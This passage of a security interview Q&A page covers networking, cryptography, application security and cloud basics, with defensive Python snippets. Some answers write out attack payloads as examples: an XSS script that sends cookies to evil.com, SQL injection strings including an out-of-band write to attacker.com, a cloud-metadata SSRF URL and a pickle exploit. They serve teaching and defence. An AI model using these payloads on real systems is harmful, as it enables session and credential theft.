blacktemple.net · Cybersecurity News & Analysis · © 2026
Security Mastery — Principal-Level Interview Q&A

120+ questions covering the depth and breadth expected at Staff/Principal/Distinguished security engineer levels. Each answer is written at the density a hiring panel expects — no fluff, no hedging.


1. Network Security Fundamentals

Q1.1: Walk through what happens when you type https://example.com into a browser, focusing on the security-relevant steps.

A: (1) Browser checks HSTS preload list — if present, forces HTTPS before any network call. (2) DNS resolution: stub resolver checks local cache, then recursive resolver. DNSSEC validation occurs if configured, verifying RRSIG records up the chain of trust. (3) TCP three-way handshake: SYN, SYN-ACK, ACK — source port ephemeral (49152-65535), destination port 443. (4) TLS 1.3 handshake: ClientHello (supported cipher suites, key shares via X25519 or P-256), ServerHello (chosen cipher, server key share), then the server's encrypted flight: EncryptedExtensions, Certificate, CertificateVerify (signature over the handshake transcript), Finished. In TLS 1.3 this is 1-RTT (vs 2-RTT in TLS 1.2). (5) Certificate validation: browser checks certificate chain to a trusted root CA, verifies signatures, checks validity period, checks Certificate Transparency (CT) logs for the cert, checks OCSP stapling or CRL for revocation. (6) Symmetric session keys derived via HKDF from the ECDHE shared secret. (7) HTTP request sent encrypted. (8) Response includes security headers: Strict-Transport-Security, Content-Security-Policy, X-Content-Type-Options: nosniff, X-Frame-Options.

Security implications at each layer: DNS is vulnerable to spoofing without DNSSEC; TCP to SYN floods and RST injection; TLS to downgrade attacks (mitigated by HSTS); certificates to CA compromise (mitigated by CT and pinning); HTTP to injection attacks (mitigated by CSP).

Q1.2: Explain the difference between TCP and UDP. When would you choose one over the other from a security perspective?

A: TCP is connection-oriented (SYN/SYN-ACK/ACK handshake), guarantees ordered delivery via sequence numbers, implements congestion control. UDP is connectionless — fire-and-forget datagrams with no delivery guarantee.

Security considerations: TCP's sequence numbers prevent trivial injection (but predictable ISNs were historically exploitable). TCP's state machine makes SYN flood attacks possible (half-open connections exhaust server resources — mitigated by SYN cookies). UDP's connectionless nature makes source IP spoofing trivial (no handshake to verify), enabling amplification attacks (DNS, NTP, memcached reflection). UDP is used for DNS (port 53, < 512 bytes), DHCP (67/68), NTP (123), QUIC (443).

When to choose: Use TCP when you need reliable delivery and can't tolerate data loss (HTTP, database connections). Use UDP when latency matters more than reliability (real-time streaming, gaming, DNS queries). QUIC (UDP-based) gives you TCP-like reliability with TLS 1.3 baked in and 0-RTT resumption.

Q1.3: How does DNS exfiltration work and how do you detect it?

A: Attacker encodes stolen data as subdomain labels: base64encodeddata.c2domain.com. A query name carries up to 253 characters (63 per label); after encoding overhead and the C2 domain suffix, each query leaks roughly 100-150 bytes of raw data. Queries traverse normal DNS infrastructure to the attacker's authoritative nameserver for c2domain.com.

Detection: (1) Monitor for unusually long subdomain labels (entropy analysis). (2) Volume of unique subdomain queries to a single domain. (3) TXT record queries of unusual size. (4) DNS queries to recently registered or low-reputation domains. (5) DNS queries at unusual frequencies. (6) Queries bypassing internal resolvers (direct queries to external DNS on port 53). Tools: passive DNS monitoring, Zeek DNS logs, Sigma rules on DNS query length thresholds.

Prevention: Force all DNS through internal resolvers (block outbound port 53/853). Deploy DNS filtering. Monitor for DoH/DoT bypass.
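
The entropy heuristic from detection step (1) is easy to prototype. A minimal Python sketch; the 40-character and 3.5-bit thresholds are illustrative starting points, not tuned values:

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits per character of the label's empirical distribution."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def looks_like_exfil(qname: str, max_label: int = 40, entropy_cutoff: float = 3.5) -> bool:
    """Flag queries whose leftmost labels are long and high-entropy."""
    labels = qname.rstrip(".").split(".")
    # Skip the registered domain (last two labels); inspect the rest.
    for label in labels[:-2]:
        if len(label) > max_label and shannon_entropy(label) > entropy_cutoff:
            return True
    return False
```

Run this over Zeek dns.log query names and tune the thresholds against your own traffic baseline before alerting on it.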

Q1.4: Explain ARP spoofing. What is the blast radius and how do you mitigate it?

A: ARP maps IP addresses to MAC addresses on Layer 2. ARP has no authentication — any host can send gratuitous ARP replies claiming to own any IP. Attacker sends forged ARP replies mapping the gateway's IP to the attacker's MAC, becoming a man-in-the-middle for all LAN traffic.

Blast radius: Entire broadcast domain (VLAN/subnet). All hosts update their ARP cache with the poisoned entry.

Mitigations: (1) Dynamic ARP Inspection (DAI) on managed switches — validates ARP packets against DHCP snooping binding table. (2) Static ARP entries for critical infrastructure (gateways). (3) 802.1X port-based NAC to authenticate devices before network access. (4) Network segmentation via VLANs to limit broadcast domains. (5) ARP monitoring tools (arpwatch). (6) In cloud/SDN: ARP spoofing is typically prevented by the hypervisor's virtual switch.

Q1.5: What is the difference between a router, a switch, and a firewall? Where does each sit in a defense-in-depth architecture?

A: Switch (Layer 2): Forwards frames based on MAC address table. Managed switches support VLANs, port security, 802.1X. Sits at the access layer. Router (Layer 3): Forwards packets between networks based on routing table. Implements ACLs, can do basic packet filtering. Sits at distribution/core layer. Firewall (Layer 3-7): Stateful packet inspection, application-layer filtering, NAT. Next-gen firewalls (NGFW) add IPS, URL filtering, TLS inspection, application identification. Sits at network perimeter, internal segmentation points, and cloud VPC boundaries.

Defense-in-depth placement: Internet → Edge firewall/WAF → DMZ → Internal firewall → Internal segmentation firewalls between zones → Host-based firewalls. Switches enforce microsegmentation at Layer 2. Routers enforce routing policy and ACLs between segments.

Q1.6: Explain subnetting. How does it relate to security?

A: Subnetting divides a network into smaller broadcast domains using subnet masks. A /24 (255.255.255.0) gives 254 usable hosts. A /28 gives 14 usable hosts.

Security relevance: (1) Network segmentation — isolate sensitive assets (databases, management interfaces) into small subnets. (2) ACLs and firewall rules are applied at subnet boundaries. (3) Smaller subnets reduce blast radius of ARP spoofing, broadcast storms, and lateral movement. (4) Principle of least privilege at the network layer — hosts should only reach what they need. (5) In cloud: VPC subnets (public vs private) determine internet reachability. Private subnets with NAT gateways prevent inbound internet access while allowing outbound.
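
The subnet arithmetic above can be checked with Python's stdlib ipaddress module (the addresses here are illustrative):

```python
import ipaddress

# Usable host counts for the subnets discussed above.
net24 = ipaddress.ip_network("10.0.1.0/24")
net28 = ipaddress.ip_network("10.0.1.16/28")

usable_24 = net24.num_addresses - 2   # minus network and broadcast addresses
usable_28 = net28.num_addresses - 2
print(usable_24)  # 254
print(usable_28)  # 14

# Firewall-rule style check: is a host inside the database subnet?
db_subnet = ipaddress.ip_network("10.0.5.0/28")
print(ipaddress.ip_address("10.0.5.9") in db_subnet)   # True
print(ipaddress.ip_address("10.0.6.9") in db_subnet)   # False
```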

Q1.7: What is the difference between IDS and IPS? What are the detection modes?

A: IDS (Intrusion Detection System) passively monitors traffic and generates alerts — inline or via SPAN/mirror port. IPS (Intrusion Prevention System) sits inline and can block/drop malicious traffic in real time.

Detection modes: (1) Signature-based: Pattern matching against known attack signatures (Snort rules, Suricata). Fast, low false positives for known attacks, blind to zero-days. (2) Anomaly-based: Establishes baseline of normal behavior, alerts on deviations. Catches zero-days but generates false positives. (3) Stateful protocol analysis: Validates traffic against expected protocol behavior (e.g., HTTP request should follow HTTP grammar). (4) Heuristic/behavioral: Combines multiple indicators to identify malicious intent.

Deployment: Network-based (NIDS/NIPS) at network choke points. Host-based (HIDS/HIPS) on endpoints (OSSEC, Wazuh). Cloud-based (VPC flow logs + GuardDuty, Azure Sentinel).


2. Cryptography

Q2.1: Explain the difference between symmetric and asymmetric encryption. Why do we use both in TLS?

A: Symmetric (AES, ChaCha20): Same key encrypts and decrypts. Fast (~1000x faster than asymmetric). Problem: key distribution — how do two parties agree on a shared secret over an untrusted channel? Asymmetric (RSA, ECDSA, Ed25519): Mathematically related key pair — public key encrypts, private key decrypts (or private signs, public verifies). Solves key distribution but is computationally expensive.

TLS uses both: Asymmetric for key exchange and authentication (ECDHE for ephemeral key agreement, RSA/ECDSA for server certificate signature verification). This establishes a shared secret. Symmetric (AES-256-GCM or ChaCha20-Poly1305) for bulk data encryption using keys derived from that shared secret via HKDF. This gives you the best of both: secure key exchange + fast data encryption.

Q2.2: What is Perfect Forward Secrecy (PFS) and why does it matter?

A: PFS ensures that compromise of long-term keys (e.g., the server's private key) does not compromise past session keys. Achieved by using ephemeral Diffie-Hellman (DHE or ECDHE) key exchange — each session generates a new random key pair, computes the shared secret, then discards the ephemeral private key.

Why it matters: Without PFS (e.g., RSA key exchange in TLS 1.2), an attacker who records encrypted traffic and later steals the server's private key can decrypt all past sessions. With PFS, each session's key is independent — stealing the long-term key only lets you impersonate the server going forward, not decrypt past traffic.

TLS 1.3 mandates PFS — only ECDHE and DHE key exchanges are supported. RSA key exchange was removed entirely.

Q2.3: Explain hashing vs. encryption vs. encoding. When do you use each?

A: Hashing (SHA-256, BLAKE3): One-way function producing fixed-length digest. Deterministic, irreversible, collision-resistant. Use for: password storage (with KDF), data integrity verification, digital signatures (hash-then-sign), deduplication, HMAC. Encryption (AES, RSA): Reversible transformation requiring a key. Use for: protecting data confidentiality at rest and in transit. Encoding (Base64, URL encoding, hex): Reversible format transformation with no key. Provides zero security — only format compatibility.

Critical mistake to flag: Encoding is not encryption. Base64 is not a security measure. Hashing is not encryption (you cannot "decrypt" a hash). MD5 and SHA-1 are broken for collision resistance — never use for security-critical applications.

Q2.4: How should passwords be stored? Walk through the full chain.

A: Never store plaintext or simple hashes. Use a key derivation function (KDF) designed for password hashing:

  1. Argon2id (winner of Password Hashing Competition) — preferred. Resistant to GPU/ASIC attacks via memory-hardness. Parameters: memory cost (64MB+), iterations (3+), parallelism (1+).
  2. bcrypt — well-proven, 72-byte input limit. Cost factor 10+ (2^10 iterations).
  3. scrypt — memory-hard, but harder to tune correctly than Argon2id.

Chain: User provides password → generate cryptographically random salt (16+ bytes) → feed password + salt into KDF with tuned work factor → store algorithm$parameters$salt$hash. On login: retrieve stored record, extract salt and parameters, hash provided password with same parameters, constant-time compare.

What NOT to do: MD5/SHA-1/SHA-256 alone (too fast — billions per second on GPU). Single round of any hash. Static/shared salt. PBKDF2 with low iteration count (minimum 600,000 for SHA-256 per OWASP 2023).
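
The full chain can be sketched with the stdlib alone. Argon2id needs a third-party package (e.g. argon2-cffi), so this sketch uses PBKDF2-HMAC-SHA256 at the OWASP floor cited above; the storage format mirrors the algorithm$parameters$salt$hash layout:

```python
import base64
import hashlib
import hmac
import secrets

ITERATIONS = 600_000  # OWASP 2023 floor for PBKDF2-HMAC-SHA256

def hash_password(password: str) -> str:
    salt = secrets.token_bytes(16)   # unique cryptographically random salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # algorithm$parameters$salt$hash, as described in the chain above
    return "$".join([
        "pbkdf2-sha256",
        str(ITERATIONS),
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    ])

def verify_password(password: str, stored: str) -> bool:
    _algo, iters, salt_b64, hash_b64 = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(),
        base64.b64decode(salt_b64), int(iters),
    )
    # Constant-time compare prevents timing side channels.
    return hmac.compare_digest(digest, base64.b64decode(hash_b64))
```

Storing the parameters alongside the hash lets you raise the work factor later and rehash on next successful login.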

Q2.5: What is a Key Derivation Function (KDF) and what are the different types?

A: KDF derives one or more cryptographic keys from a source of key material.

Password-based KDFs (slow by design): Argon2id, bcrypt, scrypt, PBKDF2. Designed to be computationally expensive to resist brute-force. Used for: password hashing, deriving encryption keys from passphrases (LUKS disk encryption uses PBKDF2/Argon2id).

Extract-and-expand KDFs (fast): HKDF (HMAC-based). Two phases: Extract (concentrate entropy from input into a fixed-length pseudorandom key) and Expand (generate multiple keys from that PRK). Used in TLS 1.3 to derive handshake keys, application keys, resumption keys from the ECDHE shared secret.

Why it matters: Using a fast hash (SHA-256) directly as a KDF for passwords is catastrophic — attacker can try billions per second. Using a slow KDF (bcrypt) for TLS key derivation would destroy performance. Match the KDF to the threat model.
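
HKDF's two phases are short enough to write out directly; a minimal RFC 5869 sketch over SHA-256, verifiable against the RFC's published test vectors:

```python
import hashlib
import hmac

def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """Extract: concentrate input keying material into a fixed-size PRK.
    An empty salt defaults to HashLen zero bytes, per RFC 5869."""
    return hmac.new(salt or b"\x00" * 32, ikm, hashlib.sha256).digest()

def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    """Expand: stretch the PRK into `length` bytes of output keying material."""
    okm, block = b"", b""
    counter = 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]
```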

Q2.6: Explain PKI. What happens when a CA is compromised?

A: Public Key Infrastructure establishes trust through a hierarchy of Certificate Authorities (CAs). Root CAs (self-signed, stored in OS/browser trust stores) sign intermediate CA certificates. Intermediate CAs sign end-entity (server/client) certificates. Certificate contains: subject, public key, issuer, validity period, extensions (SANs, key usage), signature from issuing CA.

CA compromise (e.g., DigiNotar 2011): Attacker with CA private key can issue valid certificates for any domain. Impact: trusted MITM attacks against any site. Mitigations: (1) Certificate Transparency (CT): All issued certs must be logged in append-only public logs. Domain owners monitor CT logs for unauthorized certs (Google/Facebook do this). Browsers reject certs not in CT logs. (2) CAA records: DNS records specifying which CAs are authorized to issue certs for a domain. (3) Short-lived certificates (Let's Encrypt: 90 days) reduce window of compromise. (4) OCSP stapling and CRL for revocation. (5) Certificate pinning (deprecated for web, still used in mobile apps) — hardcode expected cert/public key. (6) Remove compromised CA from trust stores (browser vendors did this to DigiNotar).

Q2.7: What is the difference between Diffie-Hellman and RSA key exchange?

A: RSA key exchange (removed in TLS 1.3): Client generates random pre-master secret, encrypts with server's RSA public key, sends to server. Server decrypts with private key. Problem: no PFS — if server's private key is compromised, all past sessions are decryptable.

Diffie-Hellman (DH/ECDHE): Both parties contribute to the shared secret. Each generates ephemeral keypair, exchanges public values. Both independently compute the same shared secret from their private key + other's public key. Even an eavesdropper who sees both public values cannot compute the shared secret (discrete logarithm problem). Provides PFS because ephemeral keys are discarded after session.

ECDHE vs DHE: ECDHE uses elliptic curves (X25519, P-256) — smaller keys, faster computation. 256-bit ECDHE ≈ 3072-bit DHE in security strength. ECDHE is the standard for TLS 1.3.

Q2.8: What are block cipher modes of operation? Which should you use?

A: Block ciphers (AES) encrypt fixed-size blocks (128 bits for AES). Modes define how to handle messages longer than one block.

ECB (Electronic Codebook): Each block encrypted independently. Catastrophically insecure — identical plaintext blocks produce identical ciphertext blocks (the famous "ECB penguin"). Never use.

CBC (Cipher Block Chaining): Each block XORed with previous ciphertext block before encryption. Requires IV. Vulnerable to padding oracle attacks (POODLE, Lucky13). Requires separate MAC (encrypt-then-MAC). Legacy — avoid for new designs.

CTR (Counter): Turns block cipher into stream cipher. Encrypts counter values, XORs with plaintext. Parallelizable. No padding needed. Requires unique nonce per message. No built-in integrity.

GCM (Galois/Counter Mode): CTR + GMAC authentication. Recommended for most use cases. Provides authenticated encryption (confidentiality + integrity). AES-256-GCM is the standard for TLS 1.3. Caveat: nonce reuse is catastrophic (leaks auth key).

ChaCha20-Poly1305: Stream cipher + MAC. Alternative to AES-GCM. Faster in software (no AES-NI hardware), constant-time by design. Used by TLS 1.3 as alternative cipher suite. Preferred on mobile/embedded without AES hardware acceleration.
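
The nonce-reuse caveat can be demonstrated without any cipher library: a CTR-style keystream is just a PRF of (nonce, counter), so reusing a nonce reuses the keystream. Here an HMAC-based PRF stands in for AES; this is a toy for illustration, not a real cipher:

```python
import hashlib
import hmac

def keystream_encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """CTR-style stream encryption with an HMAC PRF standing in for AES."""
    stream = b""
    counter = 0
    while len(stream) < len(plaintext):
        stream += hmac.new(key, nonce + counter.to_bytes(8, "big"),
                           hashlib.sha256).digest()
        counter += 1
    return bytes(p ^ s for p, s in zip(plaintext, stream))

key, nonce = b"k" * 32, b"n" * 12
p1 = b"transfer $100 to alice"
p2 = b"transfer $999 to mallo"
c1 = keystream_encrypt(key, nonce, p1)   # nonce reused for both messages
c2 = keystream_encrypt(key, nonce, p2)

# The keystream cancels: an attacker recovers p1 XOR p2 with no key at all.
xored = bytes(a ^ b for a, b in zip(c1, c2))
assert xored == bytes(a ^ b for a, b in zip(p1, p2))
```

With known or guessable plaintext in one message, p1 XOR p2 yields the other message outright; in GCM the same mistake additionally leaks the authentication key.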

Q2.9: What is HMAC and why is it better than hash(key || message)?

A: HMAC (Hash-based Message Authentication Code) = H((K' ⊕ opad) || H((K' ⊕ ipad) || message)). Two nested hash computations with padded key.

Why not hash(key || message): Vulnerable to length extension attacks with Merkle-Damgard hashes (SHA-256, SHA-512). Attacker who knows H(key || message) can compute H(key || message || padding || attacker_data) without knowing the key. This breaks integrity guarantees.

Why not hash(message || key): Vulnerable if the hash function has collisions — attacker finds two messages with same hash, both validate.

HMAC's design prevents both attacks through the double-hashing structure with inner and outer padding. It is provably a PRF under mild assumptions on the hash's compression function; it does not even require collision resistance. Used in: TLS (key derivation, finished messages), JWT signatures (HS256), API authentication (AWS Signature V4).
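
The formula maps directly to code; this sketch rebuilds HMAC-SHA256 from the definition and checks it against the stdlib hmac module:

```python
import hashlib
import hmac

def hmac_sha256(key: bytes, message: bytes) -> bytes:
    """HMAC per the formula above: H((K' ^ opad) || H((K' ^ ipad) || m))."""
    block_size = 64                          # SHA-256 block size in bytes
    if len(key) > block_size:
        key = hashlib.sha256(key).digest()   # long keys are hashed first
    k_prime = key.ljust(block_size, b"\x00") # then zero-padded to block size
    ipad = bytes(b ^ 0x36 for b in k_prime)
    opad = bytes(b ^ 0x5c for b in k_prime)
    inner = hashlib.sha256(ipad + message).digest()
    return hashlib.sha256(opad + inner).digest()

# Matches the stdlib implementation:
assert hmac_sha256(b"key", b"msg") == hmac.new(b"key", b"msg", hashlib.sha256).digest()
```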


3. Application Security

Q3.1: Walk through the OWASP Top 10 2025. What changed and why?

A: The 2025 update reshuffles and introduces new categories reflecting the evolving threat landscape:

  1. A01 Broken Access Control — Still #1. Includes IDOR, missing function-level access control, CORS misconfiguration, metadata manipulation. Most common finding in real-world testing.
  2. A02 Security Misconfiguration — Moved up. Default credentials, unnecessary features enabled, overly permissive cloud IAM, missing security headers, verbose error messages.
  3. A03 Software Supply Chain Failures — NEW. Dependency confusion, typosquatting, compromised CI/CD pipelines, malicious packages (SolarWinds, Codecov, xz-utils backdoor). Reflects the industry's growing attack surface in build systems.
  4. A04 Cryptographic Failures — Weak algorithms, missing encryption, hardcoded keys, poor key management, missing TLS.
  5. A05 Injection — SQL, NoSQL, OS command, LDAP, XSS (now folded in). Mitigated by parameterized queries, input validation, output encoding.
  6. A06 Insecure Design — Missing threat modeling, insecure design patterns, missing business logic controls. Cannot be fixed by perfect implementation — the design itself is flawed.
  7. A07 Authentication Failures — Credential stuffing, weak passwords, missing MFA, session fixation.
  8. A08 Software or Data Integrity Failures — Insecure deserialization, unsigned updates, CI/CD integrity gaps.
  9. A09 Security Logging and Alerting Failures — Missing audit logs, no alerting on suspicious activity, logs not protected from tampering.
  10. A10 Mishandling of Exceptional Conditions — NEW title. Error handling that leaks information, fails open, or creates exploitable states.

Key shift: Supply chain entered the list, reflecting real-world attack trends. XSS folded into injection.

Q3.2: Explain XSS types and their mitigations.

A: Reflected XSS: Payload in request (URL parameter) reflected in response without encoding. Requires victim to click crafted link. Example: search?q=<script>document.location='http://evil.com/?c='+document.cookie</script>.

Stored XSS: Payload persisted (database, file). Every user viewing the content gets hit. Higher impact — no social engineering needed. Example: malicious comment in a forum.

DOM-based XSS: Payload never reaches server. Client-side JavaScript reads attacker-controlled input (fragment, URL parameter) and writes it to DOM unsafely (.innerHTML, document.write, eval).

Mitigations: (1) Output encoding — context-aware: HTML entity encoding for HTML body, JavaScript encoding for JS context, URL encoding for URLs. (2) Content Security Policy (CSP) — script-src 'self' blocks inline scripts and eval. Use nonces or hashes for required inline scripts. (3) httponly cookie flag prevents JavaScript access to session cookies. (4) X-Content-Type-Options: nosniff prevents MIME-type sniffing. (5) DOMPurify for HTML sanitization in DOM context. (6) Avoid dangerous sinks (.innerHTML, eval, document.write).
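
Context-aware encoding from mitigation (1), sketched with stdlib helpers (html.escape, urllib.parse.quote, json.dumps; the trailing replace breaks any </script> sequence in the JS-string context):

```python
import html
import json
from urllib.parse import quote

payload = "<script>alert(1)</script>"

# HTML body context: entity-encode special characters.
html_safe = html.escape(payload)

# URL context: percent-encode everything outside the unreserved set.
url_safe = quote(payload, safe="")

# JavaScript string context: JSON-encode, then neutralize "<" so a
# "</script>" inside the value cannot close the surrounding script tag.
js_safe = json.dumps(payload).replace("<", "\\u003c")
```

Each sink needs its own encoder; HTML-encoding a value that lands inside a script block, or vice versa, leaves the injection open.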

Q3.3: Explain CSRF and why SameSite cookies changed the landscape.

A: CSRF: Attacker tricks authenticated user's browser into making an unintended request to a target site. Browser automatically includes cookies. Example: <img src="https://bank.com/transfer?to=attacker&amount=10000">.

Traditional mitigations: Synchronizer token pattern (unique token per session/form, validated server-side). Double-submit cookie pattern. Origin/Referer header checking.

SameSite cookies changed everything: SameSite=Lax (now default in modern browsers) prevents cookies from being sent with cross-origin subresource requests (images, iframes, forms). Cookies are only sent on same-site navigational requests (top-level GET). SameSite=Strict blocks cookies on all cross-site requests. SameSite=None; Secure explicitly allows cross-site (requires HTTPS).

Impact: With SameSite=Lax as browser default, most CSRF attacks are blocked without any application-level tokens. However, CSRF tokens remain important for: (1) supporting older browsers, (2) protecting against same-site attacks (subdomain takeover), (3) state-changing GET endpoints, since Lax still sends cookies on top-level GET navigations.
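
The synchronizer token pattern is a few lines; this sketch uses an in-memory dict as a stand-in for a real session store:

```python
import hmac
import secrets

# Illustrative session store; any server-side session backend works.
sessions: dict[str, str] = {}

def issue_csrf_token(session_id: str) -> str:
    """One unpredictable token per session, embedded in each form and
    validated on every state-changing request."""
    token = secrets.token_urlsafe(32)
    sessions[session_id] = token
    return token

def validate_csrf_token(session_id: str, submitted: str) -> bool:
    expected = sessions.get(session_id)
    # Constant-time compare; an unknown session always fails.
    return expected is not None and hmac.compare_digest(expected, submitted)
```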

Q3.4: What is SSRF and how do you prevent it?

A: Server-Side Request Forgery: Attacker makes the server send requests to unintended destinations — typically internal services, cloud metadata endpoints, or internal APIs.

Classic attack: Application fetches URL from user input (/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/role) — retrieves AWS IAM credentials from the metadata service.

Impact: Access to internal services behind firewall, cloud credential theft (IMDS), port scanning internal network, reading internal files via file:// protocol.

Prevention: (1) Allowlist approach — only allow specific domains/IPs. (2) Block private/internal IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.169.254, fd00::/8). (3) Disable unnecessary URL schemes (block file://, gopher://, dict://). (4) Use IMDSv2 on AWS (session token fetched via PUT with a default response hop limit of 1, which stops typical SSRF-based metadata theft). (5) DNS rebinding prevention — resolve DNS, validate IP, then connect to that IP (don't resolve twice). (6) Network-level controls — firewall rules preventing application servers from reaching the metadata endpoint. (7) Run URL-fetching services in isolated network segments with no access to internal resources.
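
Steps (1)-(3) and (5) combine into a single validation gate. A sketch; the scheme allowlist and error messages are illustrative. The function returns the vetted IP so the caller connects to it rather than re-resolving the hostname, which would reopen the DNS-rebinding window:

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def resolve_and_check(url: str) -> str:
    """Validate a user-supplied fetch URL: scheme allowlist, then resolve
    once and reject private/link-local/loopback/reserved ranges."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parsed.scheme!r}")
    if parsed.hostname is None:
        raise ValueError("no host in URL")
    # Resolve exactly once; link-local covers 169.254.169.254 (IMDS).
    ip = ipaddress.ip_address(socket.getaddrinfo(parsed.hostname, None)[0][4][0])
    if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
        raise ValueError(f"blocked internal address: {ip}")
    return str(ip)
```

Pair this with network-level egress controls from step (6); application-layer checks alone miss redirects served by the fetched host.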

Q3.5: Explain SQL injection. What are the variants and how do you prevent it?

A: Application constructs SQL queries by concatenating user input: "SELECT * FROM users WHERE id = '" + input + "'". Attacker input: ' OR 1=1 -- returns all users.

Variants: (1) Union-based: ' UNION SELECT username, password FROM users -- — appends attacker query results to legitimate output. (2) Error-based: Malformed queries trigger error messages revealing database structure. (3) Blind Boolean: ' AND 1=1 -- (true) vs ' AND 1=2 -- (false) — infer data bit by bit from response differences. (4) Blind Time-based: ' AND SLEEP(5) -- — infer data from response time. (5) Second-order: Payload stored in database, triggered when used in a different query later. (6) Out-of-band: ' UNION SELECT load_file('/etc/passwd') INTO OUTFILE '\\\\attacker.com\\share' -- — exfiltrate via DNS/HTTP.

Prevention: (1) Parameterized queries / prepared statements — the ONLY reliable defense. Query structure and data are sent separately to the database engine. (2) ORM frameworks (SQLAlchemy, Hibernate) use parameterized queries internally. (3) Input validation as defense-in-depth (not primary defense). (4) Least privilege database accounts — application should never connect as sa/root. (5) WAF rules as detection layer, not prevention. (6) Stored procedures — help if they use parameterized internals, hurt if they concatenate.
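
The difference between concatenation and parameterization is easy to show with an in-memory SQLite database:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice'), (2, 'bob')")

user_input = "alice' OR 1=1 --"

# VULNERABLE: concatenation lets the input rewrite the query structure.
vulnerable = f"SELECT id FROM users WHERE name = '{user_input}'"
leaked = conn.execute(vulnerable).fetchall()   # every row comes back

# SAFE: the placeholder binds the input as data, never parsed as SQL.
safe = conn.execute(
    "SELECT id FROM users WHERE name = ?", (user_input,)
).fetchall()                                   # [] -- no such literal name
```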

Q3.6: What is insecure deserialization and why is it dangerous?

A: Deserialization converts byte streams back into objects. If attacker controls the serialized data, they can manipulate object state or trigger code execution through "gadget chains" — sequences of existing class methods that chain together during deserialization to achieve arbitrary code execution.

Examples: Java's ObjectInputStream is notoriously dangerous — libraries like Commons Collections contain gadget chains that give RCE (exploited by ysoserial). Python's pickle executes arbitrary code via __reduce__. PHP's unserialize with magic methods (__wakeup, __destruct).

Impact: Remote code execution, authentication bypass, privilege escalation, DoS.

Prevention: (1) Don't deserialize untrusted data. (2) Use format-restricted serialization (JSON, protobuf) instead of native object serialization. (3) If you must deserialize: integrity checks (HMAC signature on serialized data), allowlist of permitted classes, isolate deserialization in sandboxed environments. (4) Monitor deserialization endpoints for anomalous payloads.
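
Python's pickle makes the gadget mechanics concrete. The attacker callable here is a benign stand-in for os.system, and the restricted unpickler implements the allowlist idea from prevention step (3) in its strictest form (refuse every global):

```python
import io
import pickle

calls = []

def attacker_callable(arg):
    # Stand-in for os.system; records that it actually ran.
    calls.append(arg)
    return arg

class Exploit:
    def __reduce__(self):
        # The attacker controls which callable runs at load time.
        return (attacker_callable, ("pwned",))

payload = pickle.dumps(Exploit())
pickle.loads(payload)   # attacker_callable runs DURING deserialization

class RestrictedUnpickler(pickle.Unpickler):
    """Strictest allowlist: refuse to resolve any global at all."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"blocked: {module}.{name}")

blocked = False
try:
    RestrictedUnpickler(io.BytesIO(payload)).load()
except pickle.UnpicklingError:
    blocked = True   # exploit stopped before the callable resolves
```

A real allowlist would permit a handful of known-safe classes in find_class; everything else should raise.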

Q3.7: How would you conduct a security code review?

A: Approach: Start with threat model to prioritize areas of code. Focus on trust boundaries — where user input enters, where data crosses privilege boundaries, where authentication/authorization decisions are made.

Priority checklist: (1) Authentication/authorization: How are sessions created? Where are authz checks enforced? Is there a centralized enforcement point or scattered checks? (2) Input handling: Trace every user input from entry to use. Look for unsanitized input reaching SQL, OS commands, file paths, HTML output, LDAP queries. (3) Cryptography: Hardcoded keys/secrets, weak algorithms (MD5, SHA1, DES), ECB mode, missing IVs, predictable random number generators (Math.random() for security purposes). (4) Error handling: Stack traces in responses, fail-open logic, exception swallowing. (5) Dependencies: Known vulnerable versions (SCA tools: Snyk, Dependabot). (6) Secrets: API keys, passwords, tokens in code (trufflehog, git-secrets). (7) Race conditions: TOCTOU bugs, non-atomic check-then-act. (8) Business logic: Can workflows be skipped? Can prices be manipulated? Can rate limits be bypassed?

Tools: SAST (Semgrep, CodeQL, SonarQube), SCA (Snyk, OSV-Scanner), secrets scanning (trufflehog, gitleaks).

Q3.8: What is the difference between SAST, DAST, IAST, and SCA?

A: SAST (Static Application Security Testing): Analyzes source code without executing it. Finds injection flaws, hardcoded secrets, insecure patterns. Tools: Semgrep, CodeQL, SonarQube, Checkmarx. Pros: early in SDLC, covers all code paths. Cons: high false positive rate, can't find runtime/config issues.

DAST (Dynamic Application Security Testing): Tests running application by sending crafted requests. Finds XSS, SQLi, SSRF, misconfigurations. Tools: OWASP ZAP, Burp Suite, Nuclei. Pros: finds real exploitable issues, low false positives. Cons: limited code coverage, only tests what it can reach.

IAST (Interactive AST): Agent inside the application monitors execution during testing. Correlates input to code execution to output. Tools: Contrast Security. Pros: low false positives, pinpoints exact code location. Cons: requires test execution, agent overhead.

SCA (Software Composition Analysis): Identifies vulnerable third-party dependencies. Tools: Snyk, Dependabot, OSV-Scanner, Trivy. Critical for supply chain security. Checks CVE databases and advisories.

Integrated approach: SAST + SCA in CI/CD pipeline (every PR). DAST in staging/pre-prod. IAST during QA testing. Secrets scanning as pre-commit hook.


4. Cloud Security

Q4.1: Explain the shared responsibility model. Where do most breaches occur?

A: Cloud provider secures "of the cloud" (physical infrastructure, hypervisor, network fabric, managed service internals). Customer secures "in the cloud" (data, IAM, application code, OS patching for IaaS, network configuration).

